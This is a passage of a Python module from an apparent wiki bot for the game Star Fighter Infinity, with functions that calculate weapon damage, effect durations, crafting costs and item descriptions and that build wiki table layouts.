                            remaining = secondsToCalc - t1Seconds
                            # tier 2 calculation
                            if GeneralUtils.floatCmp(remaining, '>=', 1):
                                t2Seconds = min(math.floor(t1End), math.floor(remaining))
                                totalDamage += 4 * shipMass * t2Seconds
                                remaining -= t2Seconds
                            # tier 3 calculation
                            if GeneralUtils.floatCmp(remaining, '>=', 1):
                                t3Seconds = math.floor(remaining)
                                totalDamage += 2 * shipMass * t3Seconds
                                remaining -= t3Seconds
                        totalTime -= secondsToCalc
                    elif effectName == 'Corrosion':
                        # Corrosion damage is time remaining as damage per second
                        totalDamage += (totalTime + (totalTime - secondsToCalc + 1)) * secondsToCalc / 2
                        totalTime -= secondsToCalc
                    else:
                        # If the effectTime > speedUpIfOver apply a damage multiplier
                        for j in range(0, secondsToCalc):
                            effectDamageMult = 1
                            if 'speedUpIfOver' in effectInfo and GeneralUtils.floatCmp(effectInfo['speedUpIfOver'], '>', 0):
                                if GeneralUtils.floatCmp(effectInfo['speedUpIfOver'], '<', totalTime):
                                    effectDamageMult = totalTime / effectInfo['speedUpIfOver']
                            totalDamage += SmallConstants.effectDamagesData[effectName] * effectDamageMult
                            totalTime -= 1
                    timeSinceLastCalc -= secondsToCalc
                # Each shot stacks (capped) effect time, then advances the clock.
                effectTime = item['effectTime'] * amount
                totalTime += effectTime
                if 'cap' in effectInfo and GeneralUtils.floatCmp(effectInfo['cap'], '>', 0):
                    totalTime = min(totalTime, effectInfo['cap'])
                timeSinceLastCalc += fireRate
            # Flush whatever time is still pending after the last shot.
            if GeneralUtils.floatCmp(timeSinceLastCalc, '>=', 1):
                secondsToCalc = math.floor(timeSinceLastCalc)
                if effectName == 'Radiation Damage':
                    if GeneralUtils.floatCmp(secondsToCalc, '>', effectTime):
                        # Full damage calculation
                        totalDamage += 4 * shipMass * secondsToCalc
                        timeSinceLastCalc = 0
                    else:
                        t2End = totalTime / 3
                        # BUG FIX: was `t1End = t1End * 2`, which read a stale
                        # (or unbound) t1End from the loop above; the in-loop
                        # branch derives t1End from t2End, so do the same here.
                        t1End = t2End * 2
                        # tier 1 calculation
                        t1Seconds = min(math.floor(t1End), secondsToCalc)
                        totalDamage += 6 * shipMass * t1Seconds
                        remaining = secondsToCalc - t1Seconds
                        # tier 2 calculation
                        if GeneralUtils.floatCmp(remaining, '>=', 1):
                            t2Seconds = min(math.floor(t1End), math.floor(remaining))
                            totalDamage += 4 * shipMass * t2Seconds
                            remaining -= t2Seconds
                        # tier 3 calculation
                        if GeneralUtils.floatCmp(remaining, '>=', 1):
                            t3Seconds = math.floor(remaining)
                            totalDamage += 2 * shipMass * t3Seconds
                            remaining -= t3Seconds
                elif effectName == 'Corrosion':
                    # Corrosion damage is time remaining as damage per second
                    totalDamage += (totalTime + (totalTime - secondsToCalc + 1)) * secondsToCalc / 2
                else:
                    # If the effectTime > speedUpIfOver apply a damage multiplier
                    for j in range(0, secondsToCalc):
                        effectDamageMult = 1
                        if 'speedUpIfOver' in effectInfo and GeneralUtils.floatCmp(effectInfo['speedUpIfOver'], '>', 0):
                            if GeneralUtils.floatCmp(effectInfo['speedUpIfOver'], '<', totalTime):
                                effectDamageMult = totalTime / effectInfo['speedUpIfOver']
                        totalDamage += SmallConstants.effectDamagesData[effectName] * effectDamageMult
                        totalTime -= 1
    except KeyError:
        pass
    except:
        if Config.debug:
            raise
    if totalDamage:
        # Average damage over the simulated wall-clock duration.
        return round(totalDamage / (numShotsToTest * fireRate), 4)
def GetEffectNameListForItem(item):
    """Return a sorted list of all effect names associated with an item.

    Covers hard-coded multi-effect items, shield effect bundles (a shield
    "effect" is really a named set of resists/weaknesses), the item's
    primary effect, its add-on effect, and effects implied by its
    augmentation type. Lookup failures are deliberately swallowed
    (best-effort), matching the rest of this module.

    Fix vs. previous revision: a duplicate, unreachable
    `elif augType == 'Fire Extinguisher'` branch was removed.
    """
    rtnList = set()
    itemType = GetItemType(item)
    try:
        if item['name'] == 'Red Mist Slammer':
            rtnList.update(('Red Mist Haze', 'Concussion'))
        elif item['name'] == 'Radii Nanite Repair':
            rtnList.update(('Fire Suppression', 'Shield Repair', 'Energy Recharge', 'Magnetic Disruption', 'Slow Down'))
        elif item['name'] == 'Radii Nanite Attack':
            rtnList.update(('Hard Light Decay', 'Propulsion Dehance', 'Corrosion', 'Energy Drain', 'Slow Down', 'Drift'))
        elif item['name'] == 'Ascendant Recovery Kit':
            rtnList.update(('Weapon Repel', 'Energy Recharge', 'Absorbing Stealth', 'Scanner Jammed', 'Slow Down'))
        elif item['effect'] > 0 or (item['effectTime'] > 0 and item['effect'] == 0):
            if itemType == 'Shield':
                effectName = GetShieldEffectName(item, False)
                # Named shield bundles expand into their component effects.
                shieldBundles = {
                    'Tornadian': ('Projectile Resist', 'Electrostatic Weakness'),
                    'Vampire': ('Anti Gravity',),
                    'Devimon': ('Anti Gravity', 'Heat Resist'),
                    'Enlightened': ('Heat Resist', 'Projectile Weakness'),
                    'Solarion': ('Heat Resist', 'Projectile Weakness', 'Freezing Weakness'),
                    'Rock': ('Explosive Resist', 'Laser Weakness', 'Photonic Weakness'),
                    'Refractive': ('Laser Resist', 'Photonic Resist', 'Explosive Weakness'),
                    'Andromedan': ('Stealth - Andromedan', 'Heat Weakness'),
                    'Dark': ('Anti Gravity', 'Cold Fusion Resist'),
                }
                if effectName is None:
                    pass
                elif effectName in shieldBundles:
                    rtnList.update(shieldBundles[effectName])
                else:
                    rtnList.add(effectName)
            else:
                effectName = SmallConstants.effectsData[item['effect']]['name']
                if effectName:
                    if effectName == 'Hellfire':
                        rtnList.update(('Hellfire', 'Anti Stealth'))
                    elif effectName == 'Holographic Disguise':
                        rtnList.update(('Holographic Disguise', 'Drift'))
                    else:
                        rtnList.add(effectName)
    except:
        pass
    try:
        if item['addEffect'] > 0 and item['effectTime'] > 0:
            effectName = SmallConstants.effectsData[item['addEffect']]['name']
            if effectName:
                if effectName == 'Hellfire':
                    rtnList.update(('Hellfire', 'Anti Stealth'))
                elif effectName == 'Holographic Disguise':
                    rtnList.update(('Holographic Disguise', 'Drift'))
                else:
                    rtnList.add(effectName)
    except:
        pass
    # Effects implied by the augmentation type (duplicate 'Fire Extinguisher'
    # branch from the original elif chain removed - it was unreachable).
    augType = GetItemAugType(item)
    augEffects = {
        'Self Torture': 'Heat Damage',
        'Red Mist': 'Red Mist Haze',
        'Fire Extinguisher': 'Fire Suppression',
        'Drift': 'Drift',
    }
    if augType in augEffects:
        rtnList.add(augEffects[augType])
    return sorted(rtnList)
def GetRangeDataByRangeId(rangeId):
    """Return the item-range record whose 'id' matches rangeId, or None."""
    return next(
        (rangeInfo for rangeInfo in itemRangeData.values() if rangeInfo['id'] == rangeId),
        None,
    )
def GetItemDescription(item, useHtmlForLinks=False, performLinkReplacement=True):
    """Build the display description for an item.

    The text is sourced from (in order): the item's range data, its
    '__extData' wiki scrape, then range data again including variants.
    A variant 'descriptionAppend' is attached when present. Finally all
    [placeholder] tokens ([lockingRange], [weapon], [effect], ...) are
    expanded and wiki links are optionally inserted.

    Fixes vs. previous revision:
    - re.sub was called with re.S as the 4th positional argument, which
      Python interprets as `count` (re.S == 16), not flags; now passed
      as flags=re.S.
    - itemRangeData is initialized up front so 'Mine Torpedo' items
      cannot hit an unbound local.
    """
    from SFIWikiBotLib import ShipUtils
    description = ''
    skipVariants = False
    itemRangeData = None
    if 'Mine Torpedo' not in item['name']:
        skipVariants = True if 'Cloud' in item['name'] or 'Array' in item['name'] else False
        itemRangeData = GetRangeDataForItem(item, skipVariants)
    if itemRangeData and 'description' in itemRangeData:
        description = itemRangeData['description'].replace('\r', ' ')
    if description:
        itemVariantData = GetVariantDataForItem(item)
        if itemVariantData and 'descriptionAppend' in itemVariantData and itemVariantData['descriptionAppend']:
            lchar = description[-1]
            if lchar in ['.', '!', '?']:
                description += ' '
            else:
                description += '. '
            description += itemVariantData['descriptionAppend']
    if not description:
        if '__extData' in item and 'description' in item['__extData']:
            description = item['__extData']['description']
            # Scraped text often runs sentences together; force punctuation
            # before effect sentences, then collapse any doubled punctuation.
            description = re.sub('(Has [^:]* Effect)', '. \\1', description, flags=re.S)
            description = description.replace('.. Has', '. Has').replace('!. Has', '! Has').replace('?. Has', '? Has')
            description = re.sub('Also depletes', '. Also depletes', description, flags=re.S)
            description = description.replace('.. Also depletes', '. Also depletes').replace('!. Also depletes', '! Also depletes').replace('?. Also depletes', '? Also depletes')
    if not description:
        # Last resort: retry the range data including variants.
        skipVariants = False
        itemRangeData = GetRangeDataForItem(item, skipVariants)
        if itemRangeData and 'description' in itemRangeData:
            description = itemRangeData['description'].replace('\r', ' ')
        itemVariantData = GetVariantDataForItem(item)
        if itemVariantData and 'descriptionAppend' in itemVariantData and itemVariantData['descriptionAppend']:
            if description:
                lchar = description[-1]
                if lchar in ['.', '!', '?']:
                    description += ' '
                else:
                    description += '. '
            description += itemVariantData['descriptionAppend']
    if not description:
        return ''
    # Placeholder token values; each defaults to ''.
    lrange = ''
    rangeWeaponName = ''
    subWeaponName = ''
    subWeaponLRange = ''
    amount = ''
    level = ''
    levelPlusTwo = ''
    effect = ''
    effectTime = ''
    effectPerc = ''
    invEffectPerc = ''
    subShipName = ''
    lifeTime = GetItemLife(item)
    if lifeTime is not None:
        lifeTime = GeneralUtils.NumDisplay(lifeTime, 1)
    else:
        lifeTime = ''
    if 'amount' in item:
        amount = item['amount']
    if 'level' in item:
        # Levels are stored zero-based; display is one-based.
        level = item['level'] + 1
        levelPlusTwo = item['level'] + 2
    if 'effectTime' in item:
        effectTime = item['effectTime']
    if 'effectAmount' in item:
        effectPerc = "{}%".format(GeneralUtils.NumDisplay(item['effectAmount'] * 100, 0))
        invEffectPerc = "{}%".format(GeneralUtils.NumDisplay((1 - item['effectAmount']) * 100, 0))
    try:
        if 'effect' in item and item['effect'] >= 0:
            effect = SmallConstants.effectsData[item['effect']]['name']
    except:
        print('Unable to get effect for id {} ({})'.format(item['effect'], item['name']))
    try:
        lrange = GeneralUtils.NumDisplay(GetItemRange(item))
        if lrange:
            lrange = "{}su".format(lrange)
    except:
        pass
    try:
        realRangeData = None
        if itemRangeData and 'range' in itemRangeData:
            realRangeData = GetRangeDataForItem(GetItemById(itemRangeData['range']))
        if realRangeData and 'level' in item and item['level'] > 0 and item['level'] < len(realRangeData['items']):
            rangeWeaponName = GetItemById(realRangeData['items'][item['level']])['name']
        else:
            rangeWeaponName = GetItemById(itemRangeData['range'])['name']
    except:
        pass
    try:
        subItem = GetItemSubWeapon(item)
        nameObj = SplitNameIntoBaseNameAndItemLevel(subItem['name'])
        subWeaponName = nameObj['fullNameMinusLevel']
        subWeaponLRange = subItem['lockingRange']
        if not subWeaponLRange: subWeaponLRange = GetItemRange(subItem)
        if not subWeaponLRange: subWeaponLRange = 0
        # Turrets only get half the range of their sub weapon
        if 'augType' in item and item['augType'] == 15: subWeaponLRange *= 0.5
        subWeaponLRange = GeneralUtils.NumDisplay(subWeaponLRange, 1)
        if subWeaponLRange:
            lrange = "{}".format(subWeaponLRange)
    except:
        pass
    try:
        subShip = ShipUtils.GetShipById(item['subWeaponID'])
        subShipName = subShip['name']
    except:
        pass
    tokenValues = {
        '[lockingRange]': lrange,
        '[weapon]': rangeWeaponName,
        '[subWeapon]': subWeaponName,
        '[subWeaponLockingRange]': subWeaponLRange,
        '[lifeTime]': lifeTime,
        '[life]': lifeTime,
        '[amount]': amount,
        '[level]': level,
        '[levelPlusTwo]': levelPlusTwo,
        '[effect]': effect,
        '[effectPerc]': effectPerc,
        '[invEffectPerc]': invEffectPerc,
        '[effectTime]': effectTime,
        '[subShip]': subShipName,
    }
    for token, value in tokenValues.items():
        description = description.replace(token, str(value))
    if performLinkReplacement:
        description = GeneralUtils.AddWikiLinksToText(description, useHtmlForLinks)
    return description
def GetItemSourceExtended(item, includeLink=False):
    """Describe how an item is obtained, optionally with wiki-link markup.

    Returns None when no source category matches.
    """
    if IsItemHidden(item):
        return "Unavailable"
    if 'seasonal' in item and item['seasonal']:
        return "Purchased ([[:Category:Seasonal_Items|Seasonal]])"
    if 'buyable' in item and item['buyable']:
        return "Purchased"
    if 'race' in item and item['race'] <= 1 and item['name'] != 'Micro Gate TBZ' and GetItemBPLocation(item):
        source = "Crafted"
        if includeLink and Config.craftingPageName:
            if source != Config.craftingPageName:
                source = "[[{}|{}]]".format(Config.craftingPageName, source)
            else:
                source = "[[{}]]".format(source)
        return source
    if 'race' in item and item['race'] > 1:
        # equipCategory 7 marks the ultra-rare NPR drops.
        if 'equipCategory' in item and item['equipCategory'] == 7:
            return "Ultra Rare"
        return "Rare Drop"
    if IsItemNprExclusive(item):
        source = "NPR Exclusive"
        nprName = GetRaceForItem(item)
        if not includeLink:
            return source + " ({})".format(nprName)
        wikiPage = WikiUtils.GetNprWikiPageByNprName(nprName)
        if wikiPage == nprName:
            return source + " ([[{}]])".format(nprName)
        return source + " ([[{}|{}]])".format(wikiPage, nprName)
    if item['id'] in rarePlayerRaceDropIdList:
        return "Rare Drop"
    return None
def GetItemSource(item):
    """Short source category for an item ('Purchased', 'Crafted', ...).

    Falls back to 'Unknown' when no category matches.
    """
    if 'seasonal' in item and item['seasonal']:
        return "Purchased (Seasonal)"
    if 'buyable' in item and item['buyable']:
        return "Purchased"
    if 'race' in item and item['race'] <= 1 and item['name'] != 'Micro Gate TBZ' and (GetItemBPLocation(item)):
        return "Crafted"
    if 'race' in item and item['race'] > 1:
        # equipCategory 7 marks the ultra-rare NPR drops.
        if 'equipCategory' in item and item['equipCategory'] == 7:
            return "Ultra Rare"
        return "Rare Drop"
    if IsItemNprExclusive(item):
        return "NPR Exclusive"
    if item['id'] in rarePlayerRaceDropIdList:
        return "Rare Drop"
    return "Unknown"
def GetItemSourceClassName(item):
    """CSS class name matching the item's source category, or None."""
    classBySource = {
        "Purchased (Seasonal)": 'seasonalItem',
        "Purchased": 'storeItem',
        "Crafted": 'craftedItem',
        "Rare Drop": 'nprItem',
        "NPR Exclusive": 'nprExclusiveItem',
        "Ultra Rare": 'nprUltraRareItem',
    }
    return classBySource.get(GetItemSource(item))
def GetItemSkillName(item):
    """Name of the skill required by the item, or '' when unavailable."""
    try:
        skillIdx = item['skillRequirement']['skill']
        return SmallConstants.skillsData[skillIdx]['name']
    except:
        return ""
def GetItemSkillLevel(item):
    """Required skill level for the item; 999 when requirement data is missing."""
    level = 999
    try:
        level = item['skillRequirement']['level']
    except:
        pass
    return level
def ShortenSkillName(skillName):
    """Abbreviate a skill name to the 1-2 letter code used in stat tables."""
    skillName = skillName.upper()
    abbreviations = {
        "EXPLOSIVES": "EX",
        "LIGHT": "LT",
        "PROGRAMMING": "PR",
        "SHIELDS": "SH",
    }
    # Anything else just shortens to its first letter.
    return abbreviations.get(skillName, skillName[:1])
def GetItemDps(item):
    """Damage per second for an item; None when not calculable."""
    result = None
    with suppress(ZeroDivisionError, KeyError):
        if IsBeamWeapon(item) and GeneralUtils.floatCmp(item['fireRate'], '==', 0):
            # Continuous beams already report damage per second.
            result = GetDamagePerRoundForItem(item)
        elif DisplayDamageAsPerHit(item):
            result = GetItemTotalHitCount(item) * GetDamagePerRoundForItem(item) / item['fireRate']
        else:
            result = GetDamagePerRoundForItem(item) / item['fireRate']
        result *= GetNumOfDamagingProjectiles(item)
    return result
def GetItemDpsIncludingEffectDamage(item):
    """Return the item's damage per second including effect (DoT) damage.

    Returns None when the calculation aborts (a missing dict key anywhere
    is swallowed by suppress(KeyError) and the function falls off the end).
    """
    with suppress(KeyError):
        # Turrets (augType 15) report their sub weapon's stats.
        if item['augType'] == 15:
            subWeapon = GetItemSubWeapon(item)
            if subWeapon:
                return GetItemDpsIncludingEffectDamage(subWeapon)
        dps = None
        if DisplayDamageAsPerSecond(item):
            dps = GetDamagePerRoundForItem(item)
            if 'amount' in item and item['amount'] > 1:
                dps *= item['amount']
        elif DisplayDamageAsPerHit(item):
            # Per-hit weapons: total volley damage spread over projectile lifetime.
            dps = GetItemTotalHitCount(item) * GetDamagePerRoundForItem(item) / item['life']
        else:
            dps = GetDamagePerRoundForItem(item) / item['fireRate']
        dps *= GetNumOfDamagingProjectiles(item)
        effectDps = GetItemEffectDamagePerSecond(item)
        if effectDps:
            try:
                dps += effectDps
            except:
                # dps may be None; fall back to the effect damage alone.
                dps = effectDps
        return dps
def GetItemDpe(item):
    """Damage per unit of energy; None for ammo-based or zero-damage items."""
    result = None
    with suppress(KeyError):
        damage = GetDamagePerRoundForItem(item)
        if damage > 0 and GeneralUtils.floatCmp(item['ammoOrEnergyUsage'], '>', 0) and item['energyBased']:
            if DisplayDamageAsPerHit(item):
                damage = damage * GetItemTotalHitCount(item)
            else:
                damage = damage * GetNumOfDamagingProjectiles(item)
            result = damage / item['ammoOrEnergyUsage']
    return result
def GetItemDpeIncludingEffectDamage(item):
    """Damage per energy including effect (DoT) damage; None when not applicable."""
    result = None
    with suppress(KeyError):
        totalDamage = GetDamagePerRoundForItem(item)
        if totalDamage and GeneralUtils.floatCmp(item['ammoOrEnergyUsage'], '>', 0) and item['energyBased']:
            if DisplayDamageAsPerHit(item):
                totalDamage = totalDamage * GetItemTotalHitCount(item)
            else:
                totalDamage = totalDamage * GetNumOfDamagingProjectiles(item)
            effectDamage = GetItemEffectDamage(item)
            if effectDamage:
                totalDamage = totalDamage + effectDamage
            result = totalDamage / item['ammoOrEnergyUsage']
    return result
def GetItemAugType(item):
    """Human-readable augmentation type for the item, or None when not an aug."""
    try:
        augIdx = item['augType']
        if augIdx < 0:
            return None
        rawName = SmallConstants.augTypeLookup[augIdx]
        if rawName == 'SEBalancer':
            # Special-cased: title-casing would mangle this one.
            return 'S/E Balancer'
        return GeneralUtils.CamelCaseToTitleCase(rawName.replace('_', ''))
    except:
        return None
def GetItemBPLocation(item):
    """Return the blueprint location string for a craftable item ('' if unknown).

    Resolution order: explicit Config override, the crafting data's
    locations list, then the '__extData' blueprint location.
    """
    # The compiled regex is cached as an attribute on the function object
    # so it is only compiled once per process.
    f = GetItemBPLocation
    if "locRegex" not in f.__dict__:
        f.locRegex = re.compile(r'^([A-Z][a-zA-Z0-9]*-[0-9]+-[0-9]+) \(')
    locRegex = f.locRegex
    # Config override wins outright (AttributeError covers a missing
    # Config.bpLocationOverride attribute, KeyError a missing item name).
    with suppress(AttributeError, KeyError):
        return Config.bpLocationOverride[item['name']]
    rtnVal = ''
    craftingData = GetCraftingDataForItem(item)
    if craftingData:
        if 'isSystemMicroGate' in craftingData and craftingData['isSystemMicroGate']:
            # System micro gates share the first location entry.
            itemIdx = 0
        else:
            itemIdx = craftingData['items'].index(item['id'])
        if len(craftingData['locations']) > itemIdx:
            rtnVal = craftingData['locations'][itemIdx]
    if not rtnVal:
        with suppress(KeyError):
            loc = item['__extData']['blueprintlocation']
            if loc.lower() == 'not yet available':
                rtnVal = 'N/A'
            else:
                rtnVal = loc
            # Normalize to just the system coordinate,
            # e.g. 'Abc-1-2 (details)' -> 'Abc-1-2'.
            m = locRegex.match(rtnVal)
            if m:
                rtnVal = m.group(1)
    return rtnVal
def GetItemEffectTime(item):
    """Effect duration in seconds for the item; -1 when it has no effect."""
    try:
        if item['effect'] >= 0:
            return item['effectTime']
    except:
        pass
    return -1
def GetItemPurchasePrice(item):
    """Store purchase price for the item, rounded to a significant amount.

    Large weapons (weaponType 5) use the large-value rounding mode.
    """
    rawPrice = item['price'] * itemPurchasePriceModifier
    if 'weaponType' in item and item['weaponType'] == 5:
        return int(GeneralUtils.RoundToSignificantAmount(rawPrice, False, False, True))
    return int(GeneralUtils.RoundToSignificantAmount(rawPrice))
def GetItemAmmoCost(item):
    """Cost to refill the item's ammo.

    Energy weapons cost nothing; large weapons (weaponType 5) cost full
    price; everything else is a rounded fraction of the price.
    """
    if 'energyBased' in item and item['energyBased']:
        return 0
    if 'weaponType' in item and item['weaponType'] == 5:
        return item['price']
    return int(GeneralUtils.RoundToSignificantAmount(item['price'] * ammoCostModifier, True))
def GetWeaponEffectName(item):
    """Effect name for weapons (types 2 and 3), or None when absent."""
    try:
        if item['effect'] >= 0 and item['type'] in (2, 3):
            return SmallConstants.effectsData[item['effect']]['name']
    except:
        pass
    return None
def GetItemCraftingRecipe(item):
    """Determine the crafting cost for an item and return a dictionary with the values"""
    recipe = {
        'creditCost': 0,
        'ingredientList': {},
    }
    craftingData = GetCraftingDataForItem(item)
    if craftingData:
        recipe['creditCost'] = GetCraftingCreditCostForItem(item)
        # Ingredient counts scale by one third per item level.
        levelMultiplier = 1 + (item['level'] * 0.333334)
        for ingredient in craftingData['ingredients']:
            required = ingredient['quantityRequired'] * levelMultiplier
            recipe['ingredientList'][ingredient['mineralID']] = GeneralUtils.RoundToSignificantAmount(required, True)
    return recipe
def GetCraftingCreditCostForItem(item):
    """Return the credit cost to craft an item (None when it has no crafting data).

    Uses an explicit 'creditCost' from the crafting data when present;
    otherwise estimates it from the purchase price plus a flat fee per
    ingredient, rounded to a significant amount.
    """
    # Pricing is keyed off the first (base) item sharing this item's range.
    item = GetAllItemsSharingItemRange(item)[0]
    itemCraftingData = GetCraftingDataForItem(item)
    if itemCraftingData:
        if 'creditCost' in itemCraftingData:
            return itemCraftingData['creditCost']
        # Estimated cost: 28.1% of purchase price + 150 credits per mineral.
        priceMult = 0.281
        amountToAddPerIngredient = 150
        price = GetItemPurchasePrice(item)
        mineralCount = len(itemCraftingData['ingredients'])
        calculatedValue = price * priceMult + (amountToAddPerIngredient * mineralCount)
        smallValue = True
        allowDec = False
        largeValue = True
        return GeneralUtils.RoundToSignificantAmount(calculatedValue, smallValue, allowDec, largeValue)
def GetShieldEffectName(item, includeEffectLevel=False):
    """Shield (type 5) effect name, optionally suffixed with its percentage.

    Returns None for non-shields, zero-percentage effects, or bad data.
    """
    try:
        if item['effect'] > 0 and item['type'] == 5:
            effect = SmallConstants.effectLookup[item['effect']].replace('_', ' ').title()
            effectPercentage = GeneralUtils.NumDisplay(item['effectAmount'] * 100, 0)
            if effectPercentage != '0':
                if includeEffectLevel:
                    return '{} ({}%)'.format(effect, effectPercentage)
                return effect
    except:
        pass
    return None
def GetImageUploadDownloadInfoForItem(item):
    """Collect the paths and URLs needed to mirror an item's icon locally and on the wiki."""
    itemType = SmallConstants.typeLookup[item['type']].replace('_WEAPON', '').title()
    iconName = item['iconName'] if ('iconName' in item and item['iconName']) else item['id']
    filename = "{}.png".format(iconName)
    filepath = os.path.join('public', 'images', itemType, filename)
    return {
        'description': '{} - {}'.format(ItemDisplayStatItemType(item), item['name']),
        'exists': os.path.exists(filepath),
        'filepath': filepath,
        'filename': filename,
        'name': "{}_{}.png".format(itemType, iconName),
        'url': GetItemImageUrl(item),
        'subDir': itemType,
    }
def GetItemType(item):
    """Title-cased type name for an item (weapon subtype for secondaries)."""
    if item['type'] == 3:
        rawName = SmallConstants.weaponTypeLookup[item['weaponType']]
    else:
        rawName = SmallConstants.typeLookup[item['type']]
    return rawName.replace('_', ' ').title()
def GetWikiPageForItemType(type):
    # Cheating since I already know the relevant page names
    # Todo - expand this section to cover several possibilities, in case of future name changes
    if type == 'Utility':
        return WikiUtils.GetWikiArticlePageForNameList(['Utilities'])
    if type == 'Standard':
        return WikiUtils.GetWikiArticlePageForNameList(['Standard Weapons', 'Standard Secondary Weapons'])
    if type in ('Primary Weapon', 'Mine', 'Engine', 'Shield', 'Augmentation'):
        return WikiUtils.GetWikiArticlePageForNameList([type + 's'])
    return WikiUtils.GetWikiArticlePageForNameList([type + ' Weapons'])
def GetItemImageUrl(item):
    """Direct URL to the item's icon on the game's CDN.

    Icons are served from a flat 'allItems' directory keyed by iconName,
    falling back to the item id. (A leftover, unused per-type lookup from
    the old per-type URL scheme was removed.)
    """
    iconName = item['id']
    if 'iconName' in item and item['iconName']:
        iconName = item['iconName']
    return "https://www.benoldinggames.co.uk/sfi/gamedata/icons/allItems/{}.png".format(iconName)
def GetItemWikiImage(item):
    """Wiki image name for the item, trying type+icon, full name, then base name."""
    itemType = SmallConstants.typeLookup[item['type']].replace('_WEAPON', '').title()
    iconName = item['iconName'] if ('iconName' in item and item['iconName']) else item['id']
    candidates = ["{} {}".format(itemType, iconName), item['name']]
    baseName = SplitNameIntoBaseNameAndItemLevel(item['name'])['fullNameMinusLevel']
    if baseName != item['name']:
        candidates.append(baseName)
    return WikiUtils.GetWikiImageForNameList(candidates)
def GetItemWikiArticlePage(item, p=...):
    """Find the wiki article page for an item, preferring base-name pages.

    Returns None when no candidate page exists.
    """
    typeName = GetItemType(item)
    candidates = [
        item['name'],
        "{} {}".format(item['name'], typeName),
        "{} {}".format(item['name'], GeneralUtils.GetPluralForm(typeName)),
    ]
    baseName = SplitNameIntoBaseNameAndItemLevel(item['name'])['fullNameMinusLevel']
    if baseName != item['name']:
        # Base-name candidates take priority over the level-suffixed name.
        candidates = [
            "{} {}".format(baseName, typeName),
            "{} {}".format(baseName, GeneralUtils.GetPluralForm(typeName)),
            baseName,
        ] + candidates
    itemArticlePage = WikiUtils.GetWikiArticlePageForNameList(candidates)
    if itemArticlePage:
        return itemArticlePage
    return None
def _RemoveStatColumn(tableInfo, columnName):
    """Remove columnName (and its matching title entry) from tableInfo's column lists in place; no-op when absent."""
    try:
        index = tableInfo['tableColumnList'].index(columnName)
    except ValueError:
        return
    tableInfo['tableColumnList'] = tableInfo['tableColumnList'][:index] + tableInfo['tableColumnList'][index+1:]
    tableInfo['tableColumnTitleList'] = tableInfo['tableColumnTitleList'][:index] + tableInfo['tableColumnTitleList'][index+1:]


def GetDefaultTableInfoByItemType(itemType, weaponType=..., pageType=''):
    """Return the default wiki table layout (header + column list) for an
    item type / weapon type, adjusted for the page being generated.

    pageType 'crafting' appends a BP Location column and drops columns
    that are noise on crafting pages; 'npr' drops the skill columns.
    (Refactor: three copy-pasted index/slice try blocks replaced with the
    _RemoveStatColumn helper.)
    """
    rtnInfo = {
        'tableHeader': None,
        'tableCaption': None,
        'tableClassNames': 'wikitable sortable',
        'tableColumnList': [],
        'tableColumnTitleList': [],
    }
    if itemType == 1:  # Mineral
        rtnInfo['tableHeader'] = 'Minerals'
        rtnInfo['tableColumnList'] = [ 'Name', 'Image' ]
    elif itemType == 2:  # Primary Weapon
        rtnInfo['tableHeader'] = 'Primary Weapons'
        rtnInfo['tableColumnList'] = ['Item','Dmg','TD','DPS','ROF','EU','DPE','Rng','Lt','MS','Ac','Effect','Sk']
    elif itemType == 3:  # Secondary Weapon
        if weaponType == 1:  # Standard
            rtnInfo['tableHeader'] = 'Standard Secondary Weapons'
            rtnInfo['tableColumnList'] = ['Item','Dmg','TD','DPS','ROF','Am','EU','Rng','MS','Trn','Effect','Sk']
        elif weaponType == 2:  # Utility
            rtnInfo['tableHeader'] = 'Utilities'
            rtnInfo['tableColumnList'] = ['Item','Dmg','Ammo','EU','Rng','Turn','Effect','Notes','Sk']
        elif weaponType == 3:  # Mine
            rtnInfo['tableHeader'] = 'Mines'
            rtnInfo['tableColumnList'] = ['Item','Dmg','TD','ROF','Am','EU','Arm','Lt','Effect','Sk']
        elif weaponType == 4:  # Proximity
            rtnInfo['tableHeader'] = 'Proximity Weapons'
            rtnInfo['tableColumnList'] = ['Item','Dmg','TD','ROF','Am','EU','Lt','Rng','Effect','Notes','Sk']
        elif weaponType == 5:  # Large
            rtnInfo['tableHeader'] = 'Large Weapons'
            rtnInfo['tableColumnList'] = ['Item','Dmg','TD','Range','Lt','Ammo','Cost','Ammo Cost','Notes','Sk']
    elif itemType == 4:  # Engine
        rtnInfo['tableHeader'] = 'Engines'
        rtnInfo['tableColumnList'] = ['Item','Speed','Reverse','Accel','Turning','Prop','Prop Time','Sk']
    elif itemType == 5:  # Shield
        rtnInfo['tableHeader'] = 'Shields'
        rtnInfo['tableColumnList'] = ['Item','Maximum Charge Multiplier','Charge Rate','Charge Delay','Effect Icons','Secondary Effects','Sk']
    elif itemType == 6:  # Augmentation
        rtnInfo['tableHeader'] = 'Augmentations'
        rtnInfo['tableColumnList'] = ['Item','Notes','Cost','Sk']
    elif itemType == 14:  # Collectible
        rtnInfo['tableHeader'] = 'Collectibles'
        rtnInfo['tableColumnList'] = ['Name','Image']
    if pageType and pageType is not ...:
        pageType = pageType.lower()
    if pageType == 'crafting':
        rtnInfo['tableColumnList'].append('BP Location')
        if itemType == 2:  # Primary Weapon
            _RemoveStatColumn(rtnInfo, 'Ac')
        # NOTE(review): Effect/Cost removal applied for all item types on
        # crafting pages - confirm against previous rendering if in doubt.
        _RemoveStatColumn(rtnInfo, 'Effect')
        _RemoveStatColumn(rtnInfo, 'Cost')
    elif pageType == 'npr':
        _RemoveStatColumn(rtnInfo, 'Skill')
        _RemoveStatColumn(rtnInfo, 'Sk')
    rtnInfo['tableColumnTitleList'] = GetStatNameDescriptions(rtnInfo['tableColumnList'], pageType)
    return rtnInfo
def ItemDisplayStatDamage(item, p=..., includeProjectileDisplay=True):
    """Formatted per-round damage, e.g. '12.5/s x3 <icon>'; '' for no damage."""
    perRound = GetDamagePerRoundForItem(item)
    if GeneralUtils.floatCmp(perRound, '==', 0):
        return ''
    text = GeneralUtils.NumDisplay(perRound, 1)
    if DisplayDamageAsPerSecond(item):
        text = "{}/s".format(text)
    elif DisplayDamageAsPerHit(item):
        text = "{}/hit".format(text)
    if includeProjectileDisplay:
        projectileCount = GetNumOfDamagingProjectiles(item, True)
        if projectileCount > 1:
            text = "{} x{}".format(text, projectileCount)
    text = '{} {}'.format(text, GetDamageTypeIconForItem(item))
    return text.strip()
def ItemDisplayStatTotalDamagePerVolley(item, p=..., includeIcons=False):
    """Formatted total damage per volley, with a tooltip explaining any
    included effect (DoT) damage and optional damage/effect icons.
    """
    rtnVal = None
    message = None
    totalDamage = 0
    effectName = None
    try:
        # Turrets report their sub weapon's effect name.
